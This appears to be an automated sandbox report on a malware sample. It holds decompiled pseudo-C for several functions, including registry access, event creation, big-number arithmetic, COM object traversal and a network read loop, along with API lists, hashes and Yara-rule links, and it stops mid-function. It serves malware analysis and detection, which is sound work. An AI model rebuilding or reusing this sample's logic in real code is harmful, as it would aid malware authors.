Part of subcall function 00A72BF3: SysAllocString.OLEAUT32(?), ref: 00A72C4F
Part of subcall function 00A72BF3: SysAllocString.OLEAUT32(0070006F), ref: 00A72C63
Part of subcall function 00A72BF3: SysAllocString.OLEAUT32(00000000), ref: 00A72C75
Part of subcall function 00A72BF3: SysFreeString.OLEAUT32(00000000), ref: 00A72CD9

memset.NTDLL ref: 00A763F1
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00A7642D
GetLastError.KERNEL32 ref: 00A7643D
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00A7644E

Strings

<, xrefs: 00A76402

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: 9d2cffbbf86a71307d37bfb5a063add060f00dde12467be5c36856243c1712e0
Instruction ID: 09e4a5d597249db2ee71e90a4bf4801adbed567992b0c1c051f722a5bec389db
Opcode Fuzzy Hash: 9d2cffbbf86a71307d37bfb5a063add060f00dde12467be5c36856243c1712e0
Instruction Fuzzy Hash: 311109B1900218AFDB10EFA9DD89BDE7BF8BB08384F04C026F909E7251D77499458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A72A18, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A72A18(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xa7a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0xa7a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0xa7a2b0 = _t6;
				 *0xa7a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0xa7a2ac = _t7;
				if(_t7 == 0) {
					 *0xa7a2ac =  *0xa7a2ac | 0xffffffff;
				}
				return 0;
			}

0x00a72a20
0x00a72a28
0x00a72a2d
0x00000000
0x00a72a7a
0x00a72a2f
0x00a72a37
0x00a72a77
0x00000000
0x00a72a77
0x00a72a39
0x00a72a3e
0x00a72a50
0x00a72a55
0x00a72a5b
0x00a72a63
0x00a72a68
0x00a72a6a
0x00a72a6a
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00A7446F,?,?,00000001), ref: 00A72A20
GetVersion.KERNEL32(?,00000001), ref: 00A72A2F
GetCurrentProcessId.KERNEL32(?,00000001), ref: 00A72A3E
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00A72A5B
GetLastError.KERNEL32(?,00000001), ref: 00A72A7A

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 8adc3ef498fdc5eb6e408704acc53fa43a42ec3d2635db1d53798103c598b32a
Instruction ID: e8c479c0db7d6b4a1300a4d49abc56325af8a598f8f9858ab7b84b887fcf461f
Opcode Fuzzy Hash: 8adc3ef498fdc5eb6e408704acc53fa43a42ec3d2635db1d53798103c598b32a
Instruction Fuzzy Hash: 03F0F471695301AFD720CFA5AC09B5A3BB4B794781F10C52AE64EC52F1E67144838F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00A7202E, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00A7202E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0xa7a38c);
					_t97 = 0x80000002;
					L6:
					_t60 = E00A733FA(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E00A74B4F(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E00A72A03(_a8);
						goto L29;
					}
					_t65 =  *0xa7a2d0; // 0x4aed5a8
					_t16 = _t65 + 0xa7b908; // 0x65696c43
					_t68 = E00A733FA(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d00a790
						if(E00A75C15(_t103,  *_t33, _t97, _a8,  *0xa7a384,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0xa7a2d0; // 0x4aed5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0xa7ba0f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xa7b927; // 0x55434b48
								_t73 = _t34;
							}
							if(E00A7762C(_t73,  *0xa7a384,  *0xa7a388,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0xa7a2d0; // 0x4aed5a8
									_t44 = _t75 + 0xa7b893; // 0x74666f53
									_t78 = E00A733FA(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d00a790
										E00A733B7( *_t47, _t97, _a8,  *0xa7a388, _a24);
										_t49 = _t107 + 0x10; // 0x3d00a790
										E00A733B7( *_t49, _t97, _t105,  *0xa7a380, _a16);
										E00A72A03(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d00a790
									E00A733B7( *_t40, _t97, _a8,  *0xa7a388, _a24);
									_t43 = _t107 + 0x10; // 0x3d00a790
									E00A733B7( *_t43, _t97, _a8,  *0xa7a380, _a16);
								}
								if( *_t107 != 0) {
									E00A72A03(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d00a790
					if(E00A75419( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d00a790
							E00A75C15(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E00A72A03(_t106);
						_t104 = _a16;
					}
					E00A72A03(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E00A77973(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0xa7a38c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}

0x00a7202e
0x00a72037
0x00a7203e
0x00a72043
0x00a720b0
0x00a720b6
0x00a720bb
0x00a720c4
0x00a720cb
0x00a720ce
0x00a72242
0x00a72249
0x00a72249
0x00a7224e
0x00a72250
0x00a72250
0x00a72259
0x00a72259
0x00a720d4
0x00a720e0
0x00a72238
0x00a7223b
0x00000000
0x00a7223b
0x00a720e6
0x00a720eb
0x00a720f4
0x00a720fb
0x00a720fe
0x00a72148
0x00a72148
0x00a7215b
0x00a72165
0x00a7216d
0x00a72172
0x00a7217c
0x00a7217c
0x00a72174
0x00a72174
0x00a72174
0x00a72174
0x00a7219e
0x00a721a6
0x00a721d4
0x00a721d9
0x00a721e2
0x00a721e7
0x00a721eb
0x00a7221d
0x00a721ed
0x00a721fa
0x00a721fd
0x00a7220d
0x00a72210
0x00a72216
0x00a72216
0x00a721a8
0x00a721b5
0x00a721b8
0x00a721ca
0x00a721cd
0x00a721cd
0x00a72227
0x00a72233
0x00a72229
0x00a7222c
0x00a7222c
0x00a72227
0x00a7219e
0x00000000
0x00a72165
0x00a7210d
0x00a72117
0x00a72119
0x00a7211e
0x00a72122
0x00a72124
0x00a7212f
0x00a72132
0x00a72132
0x00a72138
0x00a7213d
0x00a7213d
0x00a72143
0x00000000
0x00a72143
0x00a72048
0x00000000
0x00a7206f
0x00a7206f
0x00a7207b
0x00a7208e
0x00a72094
0x00a7209c
0x00000000
0x00a7209c

APIs

StrChrA.SHLWAPI(00A77319,0000005F,00000000,00000000,00000104), ref: 00A72061
lstrcpy.KERNEL32(?,?), ref: 00A7208E

Part of subcall function 00A733FA: lstrlen.KERNEL32(?,00A7A380,73BB7FC0,00000000,00A72788,?,?,?,?,?,00A73EAC,?), ref: 00A73403
Part of subcall function 00A733FA: mbstowcs.NTDLL ref: 00A7342A
Part of subcall function 00A733FA: memset.NTDLL ref: 00A7343C

Part of subcall function 00A733B7: lstrlenW.KERNEL32(00A77319,?,?,00A72202,3D00A790,80000002,00A77319,00A7742D,74666F53,4D4C4B48,00A7742D,?,3D00A790,80000002,00A77319,?), ref: 00A733D7

Part of subcall function 00A72A03: HeapFree.KERNEL32(00000000,00000000,00A74072,00000000,?,?,00000000,?,?,?,?,?,?,00A744AE,00000000), ref: 00A72A0F

lstrcpy.KERNEL32(?,00000000), ref: 00A720B0

Strings

\, xrefs: 00A72094

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: \
API String ID: 3924217599-2967466578
Opcode ID: cfd939cd2b644d4fda932d94f67e9b6acf79d4884efb945cbbe0c4f3f5a360ae
Instruction ID: c79277df81895fe6d492ef93806b5d1ebf405c47addc88d7fc4e03e0813c17d1
Opcode Fuzzy Hash: cfd939cd2b644d4fda932d94f67e9b6acf79d4884efb945cbbe0c4f3f5a360ae
Instruction Fuzzy Hash: 2251577650020ABFDF21DFA0DD41FEA37B9EB58300F10C524FA1996122D731DE56AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A713B4, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00A713B4(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xa7a2d0; // 0x4aed5a8
					_t5 = _t102 + 0xa7b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xa792d0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xa7a2d0; // 0x4aed5a8
												_t28 = _t108 + 0xa7b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xa7a2d0; // 0x4aed5a8
														_t33 = _t78 + 0xa7b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x00a713b9
0x00a713c2
0x00a713c3
0x00a713c7
0x00a713cd
0x00a713d3
0x00a713dc
0x00a713e2
0x00a713ec
0x00a713ee
0x00a713f4
0x00a713f9
0x00a71404
0x00a7140c
0x00a7140f
0x00a71532
0x00a71415
0x00a71415
0x00a71422
0x00a71428
0x00a7142e
0x00a71432
0x00a71438
0x00a71445
0x00a71449
0x00a7144f
0x00a71452
0x00a71458
0x00a7145e
0x00a71464
0x00a71467
0x00a7146a
0x00a71470
0x00a71479
0x00a7147f
0x00a71480
0x00a71483
0x00a71484
0x00a71485
0x00a7148d
0x00a7148e
0x00a7148f
0x00a71491
0x00a71495
0x00a71499
0x00000000
0x00000000
0x00a7149f
0x00a714a8
0x00a714ae
0x00a714b8
0x00a714bc
0x00a714be
0x00a714cb
0x00a714cf
0x00a714d7
0x00a714dc
0x00a714ee
0x00a714f0
0x00a714f6
0x00a714f6
0x00a714ff
0x00a714ff
0x00a71501
0x00a71507
0x00a71507
0x00a7150a
0x00a71510
0x00a71513
0x00a7151c
0x00000000
0x00000000
0x00000000
0x00a7151c
0x00a71470
0x00a7146a
0x00a71452
0x00a71522
0x00a71522
0x00a71528
0x00a71528
0x00a7152e
0x00a7152e
0x00a71537
0x00a7153d
0x00a7153d
0x00a713f9
0x00a71546

APIs

SysAllocString.OLEAUT32(00A792D0), ref: 00A71404
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00A714E6
SysFreeString.OLEAUT32(00000000), ref: 00A714FF
SysFreeString.OLEAUT32(?), ref: 00A7152E

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: c62d385551a7fa5271a0fcd880567f412320c292788c6a13de939d1688bda198
Instruction ID: a590efbd46f410032ce3126f61241c74c6549cd69d635127d08daba7ba29b1be
Opcode Fuzzy Hash: c62d385551a7fa5271a0fcd880567f412320c292788c6a13de939d1688bda198
Instruction Fuzzy Hash: 97513E75D00509EFCB04DFE8C9889AEB7B9FF89704B14C594E91AEB221D7319D42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A71E91, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00A71E91(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00A75278(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00A72399(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00A73C32(_t101,  &_v428, _a8, _t96 - _t81);
					E00A73C32(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00A72399(_t101, 0xa7a188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00A72399(_a16, _a4);
						E00A7114C(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00A77F56();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00A77F50();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00A75381(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00A745B4(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00A75936(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xa7a188 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00a71e94
0x00a71ea0
0x00a71ea6
0x00a71eab
0x00a71eaf
0x00a72021
0x00a72025
0x00a72025
0x00a71eb5
0x00a71eb9
0x00a71ebf
0x00a71ec0
0x00a71ecb
0x00a71ed1
0x00a71ed6
0x00a71ed9
0x00a71ef3
0x00a71f02
0x00a71f0e
0x00a71f18
0x00a71f1d
0x00a71f1f
0x00a71f22
0x00a71fd9
0x00a71fdf
0x00a71ff0
0x00a72003
0x00a72019
0x00000000
0x00a7201e
0x00a71f2b
0x00a71f32
0x00a71f36
0x00a71f3c
0x00a71f3e
0x00a71f40
0x00a71f42
0x00a71f44
0x00a71f4e
0x00a71f53
0x00a71f55
0x00a71f57
0x00a71f58
0x00a71f59
0x00a71f5a
0x00a71f61
0x00a71f68
0x00a71f6b
0x00a71f6b
0x00a71f38
0x00a71f38
0x00a71f38
0x00a71f73
0x00a71f7b
0x00a71f87
0x00a71f8c
0x00a71f8c
0x00a71f91
0x00000000
0x00000000
0x00a71f93
0x00a71f96
0x00a71fa3
0x00000000
0x00000000
0x00a71fa5
0x00a71fa5
0x00a71fb2
0x00a71f8c
0x00a71f91
0x00000000
0x00000000
0x00000000
0x00a71f91
0x00a71fbc
0x00a71fbf
0x00a71fc2
0x00a71fc9
0x00a71fc9
0x00a71fd6
0x00000000
0x00a71fd6
0x00a71ec2
0x00a71ec6
0x00a71ec7
0x00a71ec9
0x00000000
0x00000000
0x00000000
0x00a71ec9
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00A71F44
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00A71F5A
memset.NTDLL ref: 00A72003
memset.NTDLL ref: 00A72019

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 0de52d06205a9ee514425df33ffebeef9e1d5f5830fb880739fcdc5e1c73fbb4
Instruction ID: 2f3047092c0042a85331e9f8f7c5ac5908ec569d10e90953ac0f4ef0c5df2421
Opcode Fuzzy Hash: 0de52d06205a9ee514425df33ffebeef9e1d5f5830fb880739fcdc5e1c73fbb4
Instruction Fuzzy Hash: A741A032A00219AFDB10DF68CD41BEE77B9EF46310F00C56AF94DA7281DB709E458B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A7467C, Relevance: 6.1, APIs: 4, Instructions: 108
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00A7467C(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_push( &_v24);
				_push(1);
				_push(0);
				if( *0xa7a148() != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E00A75C4E(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0xa7a2c4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E00A72A03(_v20);
							if(_v8 == 0) {
								_v8 = E00A76589(_v24, _t64);
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

0x00a74684
0x00a74687
0x00a74690
0x00a74693
0x00a74696
0x00a7469e
0x00a7479c
0x00a747a7
0x00a747aa
0x00a747b2
0x00a747b9
0x00a747b9
0x00a747ac
0x00a747af
0x00a747af
0x00000000
0x00a747af
0x00a746a7
0x00000000
0x00000000
0x00a746b0
0x00a746b1
0x00a746b3
0x00a746bc
0x00a74793
0x00000000
0x00a74793
0x00a746c8
0x00a746cf
0x00a746d2
0x00a74781
0x00a74788
0x00a74788
0x00a7478e
0x00000000
0x00000000
0x00000000
0x00000000
0x00a746d8
0x00a746d8
0x00a746d8
0x00a746d8
0x00a746dd
0x00a746df
0x00a746df
0x00a746ec
0x00a746f4
0x00000000
0x00000000
0x00a746f6
0x00a74703
0x00a74709
0x00a74709
0x00a7470c
0x00000000
0x00000000
0x00a74719
0x00a7472d
0x00a74763
0x00a74766
0x00a74769
0x00a74771
0x00a7477c
0x00a7477c
0x00000000
0x00a74771
0x00a7472f
0x00a74736
0x00a7473e
0x00000000
0x00000000
0x00a74740
0x00a7474b
0x00a7474e
0x00000000
0x00a74755
0x00a74755
0x00000000
0x00a74755
0x00a7474e
0x00a74716
0x00000000
0x00a74758
0x00a74758
0x00000000

APIs

GetLastError.KERNEL32 ref: 00A7479C

Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A

GetLastError.KERNEL32 ref: 00A74710
WaitForSingleObject.KERNEL32(00000000), ref: 00A74720
GetLastError.KERNEL32 ref: 00A74740

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: f34629cf398cae7d15573adb992565a930190f435abf896a412d14f5aa0dc622
Instruction ID: ad91da7a9dc4b314b8877e571e7909dd43cbfbaac502ea97f9268a4792b9cff9
Opcode Fuzzy Hash: f34629cf398cae7d15573adb992565a930190f435abf896a412d14f5aa0dc622
Instruction Fuzzy Hash: E34115B4D01209EFDF14DFA4CD889AEBBB9FB49341F60C46AE50AE6150E7309E81DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00A74CD5, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00A74CD5(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xa7a2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0xa7a2d0; // 0x4aed5a8
				_t3 = _t8 + 0xa7b84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E00A71970(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xa7a2d4, 1, 0, _t30);
					E00A72A03(_t30);
				}
				_t12 =  *0xa7a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E00A719E7() == 0) {
						_t28 =  *0xa7a124( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E00A763CD(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E00A77836(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
